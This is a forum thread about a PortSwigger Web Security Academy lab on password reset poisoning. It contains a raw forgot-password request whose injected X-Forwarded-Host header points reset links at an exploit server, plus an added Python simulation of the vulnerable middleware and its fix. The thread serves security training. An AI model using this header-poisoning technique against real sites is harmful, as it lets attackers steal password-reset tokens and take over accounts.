Host header not present - Password reset poisoning via middleware

Dennis | Last updated: Mar 25, 2022 01:53AM UTC

Hi, I'm trying to complete the lab "Password reset poisoning via middleware". I sent POST /forgot-password to Repeater and added "X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net" to the request. It looks like this in Repeater:

POST /forgot-password HTTP/1.1
Host: aca81fc11fb90044c029b70c00d3002f.web-security-academy.net
Cookie: session=r7onTvLunxE8EyQxuIqVXubS51iFgcr7
Content-Length: 15
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net/forgot-password
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net
Connection: close

username=carlos

When I click Send, I get:

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 25

"Host header not present"

According to the video in the community solutions I should get a 200 OK response. I can't figure out what is going wrong here. I also tried to remove "exploit-" at the beginning of the link, which results in the same error. Could you tell me what I'm doing wrong? Thank you.

Hannah, PortSwigger Agent | Last updated: Mar 25, 2022 11:20AM UTC

It looks like you're using a full URL as your X-Forwarded-Host value. Try comparing the value you're using to the existing Host header, and spot the difference between the two.
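
The difference Hannah is pointing at is that Host and X-Forwarded-Host both carry a host value ("hostname[:port]"), never a URL with a scheme or path. The following is an added example, not code from the thread or from the lab: it models a middleware that lets X-Forwarded-Host override Host when building the password-reset link, so that a bare exploit hostname poisons the link while a "https://..." value fails host validation. The two hostnames are the ones quoted in the thread; the hostname pattern, the "token" query parameter, the fall-through to a 400 (rather than falling back to Host) and the reuse of the thread's error text are assumptions made for illustration, and the hardened variant (a configured canonical host, headers ignored) is the usual fix rather than anything the lab shows.

```python
import re
import secrets
from typing import Mapping, Optional, Tuple

# Added example (not the lab's or PortSwigger's code). A Host / X-Forwarded-Host
# value is "host[:port]": DNS labels of 1-63 characters plus an optional numeric
# port. Constructed pattern; a scheme ("https://") or a path never matches.
_HOST_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
    r"(?::\d{1,5})?$"
)


def parse_host(value: Optional[str]) -> Optional[str]:
    """Return the normalised host if `value` is a syntactically valid Host header
    value, otherwise None. "https://example.net" and "a/b" are URLs, not hosts."""
    if not value:
        return None
    value = value.strip()
    if not _HOST_RE.fullmatch(value):
        return None
    return value.lower()


def effective_host(headers: Mapping[str, str], trust_forwarded: bool) -> Optional[str]:
    """Choose the host the reset link is built from.

    trust_forwarded=True is the vulnerable middleware: a present X-Forwarded-Host
    wins over Host. Assumption for this model: an invalid X-Forwarded-Host is not
    rescued by a valid Host, which is how the thread's 400 is reproduced here."""
    lower = {k.lower(): v for k, v in headers.items()}
    if trust_forwarded and "x-forwarded-host" in lower:
        return parse_host(lower["x-forwarded-host"])
    return parse_host(lower.get("host"))


def forgot_password(
    headers: Mapping[str, str],
    username: str,
    trust_forwarded: bool = True,
    canonical_host: Optional[str] = None,
    token: Optional[str] = None,
) -> Tuple[int, str]:
    """Simulate POST /forgot-password. Returns (status, body); on 200 the body is
    the reset link that would be e-mailed to `username`.

    canonical_host is the hardened configuration: the link is built from the
    application's configured host and neither Host nor X-Forwarded-Host is
    consulted, so an attacker-controlled host can never reach the e-mail."""
    if canonical_host is not None:
        host: Optional[str] = canonical_host
    else:
        host = effective_host(headers, trust_forwarded)
    if host is None:
        # Error text reused from the thread; assumed, not the lab's real handling.
        return 400, "Host header not present"
    token = token or secrets.token_hex(16)   # stand-in for the real reset token
    # "token" is an assumed parameter name, not the lab's.
    return 200, f"https://{host}/forgot-password?token={token}"


if __name__ == "__main__":
    victim = "aca81fc11fb90044c029b70c00d3002f.web-security-academy.net"
    exploit = "exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net"
    # Full URL in X-Forwarded-Host: not a host, request rejected.
    print(forgot_password({"Host": victim, "X-Forwarded-Host": "https://" + exploit}, "carlos"))
    # Bare hostname: the link carlos receives now points at the exploit server.
    print(forgot_password({"Host": victim, "X-Forwarded-Host": exploit}, "carlos"))
    # Hardened: the configured host is used whatever the headers say.
    print(forgot_password({"Host": victim, "X-Forwarded-Host": exploit}, "carlos",
                          canonical_host=victim))
```

Running the block prints the rejected request, the poisoned link, and the link the hardened configuration would produce. The practical check when a lab or target returns 400 on this step is the one Hannah suggests: the X-Forwarded-Host value should look exactly like a Host value, so compare it character by character against the existing Host header before looking for other causes.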

Dennis | Last updated: Mar 28, 2022 10:06PM UTC

Thank you Hannah! I thought I tried without https:// as well, but apparently not, because it works now. :-)

Hannah, PortSwigger Agent | Last updated: Mar 29, 2022 07:56AM UTC

Glad to hear it! Hope you enjoy the rest of the labs :)

